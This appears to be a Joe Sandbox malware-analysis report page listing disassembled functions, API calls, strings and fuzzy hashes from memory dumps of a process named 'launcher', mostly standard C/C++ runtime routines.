Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: 0c897ebc27cdd3eac29a2c5e41dcee7cd61824acc2b49aa39d8d1e8a62d42931
Instruction ID: c95f036dc274fd1edd02fafe8c47529a2a14aa12b50d95e09a6a561549170632
Opcode Fuzzy Hash: 0c897ebc27cdd3eac29a2c5e41dcee7cd61824acc2b49aa39d8d1e8a62d42931
Instruction Fuzzy Hash: D741AB75900208DFCF28DF68C945DAEB7F5EF48300F6880DDE649A7646CB34AA04CB52

Function 00B455C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00B5BE94,000000FF,?,00B45685,00B4556C,?,00B45721,00000000), ref: 00B455F9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B4560B
FreeLibrary.KERNEL32(00000000,?,?,00000000,00B5BE94,000000FF,?,00B45685,00B4556C,?,00B45721,00000000), ref: 00B4562D

Strings

mscoree.dll, xrefs: 00B455F2
CorExitProcess, xrefs: 00B45603

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2632a53f306d8142fc42d9b35ee2dee519ad2915a71b619df43e40d19da7ad07
Instruction ID: 21e68603d4b81c3bbc89dfbb9bf6d3b37742e426660cc050384829ab03fd2b1c
Opcode Fuzzy Hash: 2632a53f306d8142fc42d9b35ee2dee519ad2915a71b619df43e40d19da7ad07
Instruction Fuzzy Hash: 4E016231A40A59AFDB119F54DC09FAEBBF8FB04B15F010565F811A32E0DFB89A04CA90

Function 00B4D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B4D76F
__alloca_probe_16.LIBCMT ref: 00B4D838
__freea.LIBCMT ref: 00B4D89F

Part of subcall function 00B4BF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,00B3A67D,00000018,?,00B33D4A,00000018,00000000), ref: 00B4BF43

__freea.LIBCMT ref: 00B4D8B2
__freea.LIBCMT ref: 00B4D8BF

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 7d785a2022e0c4afdb885c590c68cd556e008e42d2b66386655bdcfd8b108974
Instruction ID: f2ff9744b3838854cdfdd9707430bd38eff4df4d766ec92f303743ee70d26c08
Opcode Fuzzy Hash: 7d785a2022e0c4afdb885c590c68cd556e008e42d2b66386655bdcfd8b108974
Instruction Fuzzy Hash: 8051A672A00206AFEB215F61CC81EBB7BE9EF44750F2506B9FD14D7251EB70DE50A6A0

Function 00B3EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B3F005
AcquireSRWLockExclusive.KERNEL32(00B38E38), ref: 00B3F024
AcquireSRWLockExclusive.KERNEL32(00B38E38,00B3A2F0,?), ref: 00B3F052
TryAcquireSRWLockExclusive.KERNEL32(00B38E38,00B3A2F0,?), ref: 00B3F0AD
TryAcquireSRWLockExclusive.KERNEL32(00B38E38,00B3A2F0,?), ref: 00B3F0C4

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: e2fed96066be7f60d26fe4bbb5ed8535e95fb4be93110b700d72563840e8749b
Instruction ID: 87a83a3317751c1a0077e6e1c9a8534f306a7aef534576e7f940f1cbf78aa667
Opcode Fuzzy Hash: e2fed96066be7f60d26fe4bbb5ed8535e95fb4be93110b700d72563840e8749b
Instruction Fuzzy Hash: E3414671900A0BDBCB28CF69C48197AB3F5FF04311F3049BAE45697652DB74E985CB51

Function 00B33C70 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B33CA5
std::_Lockit::_Lockit.LIBCPMT ref: 00B33CBF
std::_Lockit::~_Lockit.LIBCPMT ref: 00B33CE0
__Getctype.LIBCPMT ref: 00B33D92
std::_Lockit::~_Lockit.LIBCPMT ref: 00B33DD8

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
String ID:
API String ID: 3087743877-0
Opcode ID: 10459c5237d8972dfe1fdf561e49ba89ab1da1eb0252216acd20bec2d5166107
Instruction ID: aebef4b8a82e1180b1270bacb7bf5557d17ec8b5065985387944517ccc53cac0
Opcode Fuzzy Hash: 10459c5237d8972dfe1fdf561e49ba89ab1da1eb0252216acd20bec2d5166107
Instruction Fuzzy Hash: CC414771E002188BCB14DF94C840BAEBBF1FF44B20F2482A9D8556B391DB78AE45CB91

Function 00B3D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B3D4C9
std::_Lockit::_Lockit.LIBCPMT ref: 00B3D4D3
int.LIBCPMT ref: 00B3D4EA

Part of subcall function 00B3C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00B3C1F6
Part of subcall function 00B3C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3C210

codecvt.LIBCPMT ref: 00B3D50D
std::_Lockit::~_Lockit.LIBCPMT ref: 00B3D544

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID:
API String ID: 3716348337-0
Opcode ID: 41682d9847e615aca621b9ec35871ef186d0a41bed3cb48e5580697c5640d962
Instruction ID: 1453feb5751ebf5552f9c6a5027d1cbdbb170f08aaab3cc2a0c35c836cffca48
Opcode Fuzzy Hash: 41682d9847e615aca621b9ec35871ef186d0a41bed3cb48e5580697c5640d962
Instruction Fuzzy Hash: 0E01D6319001159FCB05EBA8D901ABEBBF5AF94324F350599F815AB2C2DF749E04C791

Function 00B3ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B3ADDE
std::_Lockit::_Lockit.LIBCPMT ref: 00B3ADE9
std::_Lockit::~_Lockit.LIBCPMT ref: 00B3AE57

Part of subcall function 00B3ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00B3ACC2

std::locale::_Setgloballocale.LIBCPMT ref: 00B3AE04
_Yarn.LIBCPMT ref: 00B3AE1A

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: f0a3ab0fd842b9927e2fb8342bc7b69b99b7de42c106bff8c43d17c80e9aa340
Instruction ID: 018ecf1cacce8990502114d0a2389f88286385a0e42ad26f8e3662d84e2ba55c
Opcode Fuzzy Hash: f0a3ab0fd842b9927e2fb8342bc7b69b99b7de42c106bff8c43d17c80e9aa340
Instruction Fuzzy Hash: 91019A75A006619BCB06EB20D85297D7BE1FF88750F340099E846573C1CF78AE42CB82

Function 00B31750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00B31783

Strings

ios_base::eofbit set, xrefs: 00B31BEA
ios_base::failbit set, xrefs: 00B31BEF
ios_base::badbit set, xrefs: 00B31BFA, 00B31C20

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: _strlen
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4218353326-1866435925
Opcode ID: 5871c9d22b308eef8a0abf6eaff85a9cfa17234a7d4860c893c56f7d2db66cd7
Instruction ID: dfafcf94d474d9d1f7e0aa0ab8b89590a959fdf2013fb42a82e227d5e7f7d2bc
Opcode Fuzzy Hash: 5871c9d22b308eef8a0abf6eaff85a9cfa17234a7d4860c893c56f7d2db66cd7
Instruction Fuzzy Hash: 06F18F75A016148FCB14CF6CC494BADB7F5FF88320F2986A9E815AB391D774AD05CB90

Function 00432558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 004324F2
GetSystemMetrics.USER32 ref: 0043258C
GetSystemMetrics.USER32 ref: 0043259B

Strings

, xrefs: 00432650

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: MetricsSystem$DeleteObject
String ID:
API String ID: 4263548647-3916222277
Opcode ID: 57fbc9109df38716b725a62949cd77e462262b98bef2d0720ae892151d84bec4
Instruction ID: 4c57782eba6e6bd42ffdf7c529fe5e6315355c235c3fbf3c232185656f83a987
Opcode Fuzzy Hash: 57fbc9109df38716b725a62949cd77e462262b98bef2d0720ae892151d84bec4
Instruction Fuzzy Hash: 7041C2B4D142548FDB00EFA8E98565DBBF0FB88304F10892EE998DB354D774A958CF92

Function 00B3B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00B3B809

Strings

MOC, xrefs: 00B3B789
csm, xrefs: 00B3B7A1
RCC, xrefs: 00B3B795

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: 437d809e37485b8aca23fd6c387be4847f0228163c67052b7d82073654aeb43c
Instruction ID: c3299c4f769664f1d36cd648233dbe6523245481da504a74465600632b1a95c4
Opcode Fuzzy Hash: 437d809e37485b8aca23fd6c387be4847f0228163c67052b7d82073654aeb43c
Instruction Fuzzy Hash: AB21C235901709DFCF289F94C855F6AB7ECEF40720F3445AEE6118B694DB34AE40CA91

Function 00B56940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B569DC,00000000,?,00B6D2B0,?,?,?,00B56913,00000004,InitializeCriticalSectionEx,00B60D34,00B60D3C), ref: 00B5694D
GetLastError.KERNEL32(?,00B569DC,00000000,?,00B6D2B0,?,?,?,00B56913,00000004,InitializeCriticalSectionEx,00B60D34,00B60D3C,00000000,?,00B4BBBC), ref: 00B56957
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B5697F

Strings

api-ms-, xrefs: 00B56964

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 343c9c26def240c172c2ea5418c7794e95b55b4cd5c45617f635c392ba575144
Instruction ID: 95d9356308f53ab8dbefee08cdc36851124b32081d3c18e8c27e215f20f42235
Opcode Fuzzy Hash: 343c9c26def240c172c2ea5418c7794e95b55b4cd5c45617f635c392ba575144
Instruction Fuzzy Hash: 02E01A31380204BAEF201B60EC46B6C3B95EB54B92F5404B0FE4CA94E0EBB5EC589984

Function 00B53F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00B54001

Part of subcall function 00B4C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B4D895,?,00000000,-00000008), ref: 00B4C082

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B54253
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B54299
GetLastError.KERNEL32 ref: 00B5433C

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: c4e56fb8e2e9fa8f0769013df39e7aee5062ab24c2db982e3d50a976e4e10298
Instruction ID: 289ed1d4b0c6697182667193bbfe2be122a55d383213fa34753e39da70d624a9
Opcode Fuzzy Hash: c4e56fb8e2e9fa8f0769013df39e7aee5062ab24c2db982e3d50a976e4e10298
Instruction Fuzzy Hash: 7ED16A75D002589FCB15CFA8C880AEDBBF5FF09318F2845AAE955EB351DB30A985CB50

Function 00B4B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B4B35C
___AdjustPointer.LIBCMT ref: 00B4B37F
___AdjustPointer.LIBCMT ref: 00B4B41B

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 38b1cee924a80d80395db69c269dbf63f7b1009665d653b377e0dca5f3eedb64
Instruction ID: b32b26480e5bfa12cd431f41186870ff7adebde73eefc307c455e4d77e0ed3f7
Opcode Fuzzy Hash: 38b1cee924a80d80395db69c269dbf63f7b1009665d653b377e0dca5f3eedb64
Instruction Fuzzy Hash: 0451E172A04602AFDB289F56C891FBA77F4EF04710F2445ADEA06472A1D731EE40FB94

Function 00B37220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B372C5
std::_Throw_Cpp_error.LIBCPMT ref: 00B37395
std::_Throw_Cpp_error.LIBCPMT ref: 00B373A3
std::_Throw_Cpp_error.LIBCPMT ref: 00B373B1

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 91330172625a598b05106cf3465564f72c526568fb4dfacd9fd5091283e474e6
Instruction ID: f5401ae5a24eb5855549cdcf136c8b746d89906b841f3faca2c1429de0a533a3
Opcode Fuzzy Hash: 91330172625a598b05106cf3465564f72c526568fb4dfacd9fd5091283e474e6
Instruction Fuzzy Hash: 1141F1F19407499BDB30EB24C881BABB7F4FF44320F2446B9D82647691EB30E816CB95

Function 00B34460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B34495
std::_Lockit::_Lockit.LIBCPMT ref: 00B344B2
std::_Lockit::~_Lockit.LIBCPMT ref: 00B344D3
std::_Lockit::~_Lockit.LIBCPMT ref: 00B34580

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 53f6db1ddde7fb72578d6d45111161b7f4231eb6bc64c666e746f50437840fd6
Instruction ID: 20f3208b220e44edff1f87da766724f70e26644927147b765d88071a0f986a6e
Opcode Fuzzy Hash: 53f6db1ddde7fb72578d6d45111161b7f4231eb6bc64c666e746f50437840fd6
Instruction Fuzzy Hash: 7E416771D002588FCB10DF94D844BAEBBF0FB58720F2542A9E85567391DB78AD44CFA1

Function 00B51DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00B4C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B4D895,?,00000000,-00000008), ref: 00B4C082

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B51E2A
__dosmaperr.LIBCMT ref: 00B51E31
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B51E6B
__dosmaperr.LIBCMT ref: 00B51E72

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 1321da196e5cb45c68f0d0d3a6d2a2864a428ce16f25eaa9364b57db047da224
Instruction ID: 78448496bd91453d4684753ea4b6aeaec718f943a626dad2b6c9b3a3ee3969a1
Opcode Fuzzy Hash: 1321da196e5cb45c68f0d0d3a6d2a2864a428ce16f25eaa9364b57db047da224
Instruction Fuzzy Hash: AE21D031600205BFCB21AF698882B2BB7E9FF00366B1089E8FC1997140DB30ED05DBA0

Function 00B42BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e238f905b8ed9a8c05691c3a185c7f493684810706079538bc08cf799ea4012
Instruction ID: c3227f9386f4bcf8aee61d21c8fbbf0a3fef0a5f64c0d8e739c7aae9527c45ec
Opcode Fuzzy Hash: 2e238f905b8ed9a8c05691c3a185c7f493684810706079538bc08cf799ea4012
